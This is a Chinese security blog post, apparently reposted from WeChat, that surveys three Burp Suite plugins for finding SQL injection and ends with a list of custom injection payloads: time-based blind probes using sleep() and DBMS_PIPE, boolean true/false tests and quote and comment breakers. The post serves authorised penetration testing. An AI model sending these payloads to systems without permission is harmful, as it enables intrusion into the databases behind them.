burpsuite当中用于测试SQL注入的插件
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途给予盈利等目的,否则后果自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
xia_sql
https://github.com/smxiazi/xia_sql
本插件仅只插入单引号,没有其他盲注啥的,且返回的结果需要人工介入去判断是否存在注入,如果需要所有注入都测试,请把burp的流量转发到xray。
DetSql
https://github.com/saoshao/DetSql
DetSql是基于 BurpSuite Java 插件 API 开发的 SQL 注入探测插件,主要作用为快速从 http 流量中筛选出可能存在 SQL 注入的请求,在尽可能减少拦截的情况下提高 SQL 注入测试效率。
注意DetSql采用 Montoya API 进行开发,BurpSuite 版本需满足(>=2023.12.1)。
判断方式
为方便叙述使用 value 表示请求的一个参数值,respbody 表示该请求的响应体,value->respbody,表示参数值为 value 时发送请求得到响应体 respbody,以下判断依赖 MySQL,sqlserver,oracle,postgresql 四种数据库某版本测试结果。
gatherBurp
https://github.com/kN6jq/gatherBurp
一款强大的 burp 安全测试插件,集成多种安全测试功能,支持自动化扫描和手动测试。
所有功能均可通过右键菜单快速调用:
自定义payload
'%20and%20sleep(3)%23'/**/and/**/'6'='6
'/**/and/**/'6'='7
'/**/or/**/'6'='6
'/**/or/**/'6'='7
'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',5)='p
'/**/or/**/DBMS_PIPE.RECEIVE_MESSAGE('p',5)='p
'/**/and/**/(select%206620%20from%20(select(sleep(5)))mldt)/**/and/**/'1'='1
/**/and/**/4=4
/**/and/**/4=5
/**/or/**/4=4
/**/or/**/4=5
/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('p',5)=2
/**/or/**/DBMS_PIPE.RECEIVE_MESSAGE('p',5)=2
/**/and/**/(select%206620%20from%20(select(sleep(5)))mldt)/**/and/**/2=2
'
''
')
')('
0'XOR(if(1,sleep(6),0))XOR'Z
/*xx*/
/*xx*
'/*xx*/'
'/*xx*'
"/*xx*/"
"/*xx*"
参考资料
https://mp.weixin.qq.com/s/AbCXP4aCGALkWl_nIXDewg
原文始发于微信公众号(进击的HACK):burpsuite SQL注入插件
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论